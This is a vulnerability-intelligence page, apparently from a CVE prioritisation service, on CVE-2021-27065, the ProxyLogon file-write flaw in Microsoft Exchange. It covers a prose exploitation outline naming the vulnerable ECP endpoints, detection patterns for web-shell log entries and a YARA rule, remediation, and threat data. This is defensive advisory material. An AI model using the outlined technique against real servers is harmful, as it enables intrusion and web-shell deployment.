ThreatLevelBeta
Planned Fix

CVE-2021-27065

Remote Code Execution in Microsoft Exchange Server
Loading...

Summary

Microsoft Exchange Server’s ECP and OAB handling contains a post-authentication arbitrary file write flaw. An attacker with authenticated Exchange access can abuse crafted ECP requests and virtual-directory settings to write files to attacker-chosen paths, often dropping a web shell. In the ProxyLogon chain, this vulnerability can be combined with the earlier authentication bypass to reach unauthenticated remote code execution and broader server compromise.

Why Planned Fix?

4/6
Authentication required
Commonly internet-facing deployment
User interaction needed
Exploitable in default configuration
Active exploitation in the wild
High impact vulnerability

Exploitation Details

Type
RCE (Remote Code Execution)
Is exploitable with default configuration?
Yes
Is authentication needed?
Yes
PoC / Exploit
Yes
packetstormsecurity.com
Impact

Write arbitrary files to attacker-chosen paths, enabling web-shell deployment and code execution

RCE (Remote Code Execution)
Exploitation Requirements
  • Authentication required
Exploitation Process

An attacker first obtains authenticated access to the Exchange server, either with legitimate credentials or by chaining another Exchange bug in the ProxyLogon flow. They then send crafted ECP/DDI requests that manipulate OAB or virtual-directory URL properties so the server writes attacker-controlled content to a chosen path. If the payload is written into a web-accessible location, the attacker requests the dropped file to execute commands and establish a web shell.

Detection Resources
Manual Detection
microsoft.comic3.gov
2
Script Detection
microsoft.github.io
1
Scanner Detection
Tenable Nessus
1

Affected Software

Vendor:Microsoft
ProductAffected Versions
Microsoft Exchange Server2013 SP1 and CU21 through CU23, 2016 CU8 through CU19, 2019 RTM through CU8
Description

On-premises Microsoft Exchange Server is an enterprise email, calendaring, and messaging platform for mailboxes, shared calendars, and collaboration.

Deployment:Commonly internet-facing
|
Protocol:HTTPS
|
Ports:443
Affected ComponentExchange Control Panel (ECP) and Offline Address Book (OAB) virtual directory handling, especially ECP DDI requests that modify virtual-directory URL properties.

Exchange Control Panel (ECP) and Offline Address Book (OAB) virtual directory handling, especially ECP DDI requests that modify virtual-directory URL properties.

Affected Endpoints(2)/ecp/DDI/DDIService.svc/SetObject, /ecp/DDI/DDIService.svc/GetObject…
1./ecp/DDI/DDIService.svc/SetObject
2./ecp/DDI/DDIService.svc/GetObject
Enterprise UsageEstimated likelihood that this vendor/product is deployed in enterprise environments. AI-generated estimation based on market presence, product type and adoption signals — not exact data.
Very Low
Low
Medium
High
Very High
Vendor Size:Big
Remediation
Workaround
Temporarily disable the Exchange Control Panel and Offline Address Book virtual directories using Microsoft's mitigation tooling (EOMT.ps1 or ExchangeMitigations.ps1) until patching is completed.

Temporarily disable the Exchange Control Panel and Offline Address Book virtual directories using Microsoft's mitigation tooling (EOMT.ps1 or ExchangeMitigations.ps1) until patching is completed.

www.microsoft.com
Patch
Apply Microsoft security update KB5000871 for the affected Exchange Server cumulative update or service pack, then reboot as required.

Apply Microsoft security update KB5000871 for the affected Exchange Server cumulative update or service pack, then reboot as required.

support.microsoft.com
Update

Not available

Threat Intelligence
EPSS Score94.3%

Probability of exploitation in the next 30 days

EPSS Percentile100%

Worse than 100% of all CVEs

Last updated: Loading...
CISAKEV
CISA KEV
Listed
Loading...
Active Exploitation
Active
microsoft.com
Threat Actors1
HAFNIUM

China-based state-sponsored group targeting U.S. research, legal, education, defense, policy, and NGO sectors

Detection Rules2
Other
ECP server log entries containing `Set-OabVirtualDirectory.ExternalUrl=` or other `Set-.+VirtualDirectory` changes
Yara
WEBSHELL_CVE_2021_27065_Webshells: YARA for small ASPX web shells using `runat="server"` plus `ExternalUrl`/`InternalUrl` strings

NVD Data

Published: Loading...Modified: Loading...

Description Summary

Microsoft Exchange Server Remote Code Execution Vulnerability

CVSS Base Score

7.8
High

CVSS Vector (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Attack Vector (AV)
Physical
Local
Adjacent
Network
Attack Complexity (AC)
High
Low
Privileges Required (PR)
High
Low
None
User Interaction (UI)
Required
None
Scope (S)
Unchanged
Changed
Confidentiality (C)
None
Low
High
Integrity (I)
None
Low
High
Availability (A)
None
Low
High
CWE:CWE-22 Path TraversalCWE-22 Path Traversal
|
NVD:CVE-2021-27065
|
Version From:
|
Version Upto:

Affected Software (CPE) (22)

  • cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2013:sp1:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_10:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_11:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_12:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_13:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_14:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_15:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_16:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_17:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_8:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:-:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_1:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_2:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_3:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_4:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_5:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_6:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*
  • cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*

Sources

10
SourceArticle
www.microsoft.comHAFNIUM targeting Exchange Servers with 0-day exploits
www.microsoft.comMicrosoft Exchange Server Vulnerabilities Mitigations - updated March 15, 2021
www.microsoft.comExploit:ASP/CVE-2021-27065
support.microsoft.comExchange Server security update KB5000871
nvd.nist.govCVE-2021-27065 Detail
microsoft.github.ioTest-ProxyLogon
www.tenable.comCVE-2021-27065
www.cisa.govKnown Exploited Vulnerabilities Catalog
www.ic3.govJoint Cybersecurity Advisory: Compromise of Microsoft Exchange Server
packetstormsecurity.comMicrosoft Exchange ProxyLogon Remote Code Execution

Priority History

Planned FixLoading...

Initial analysis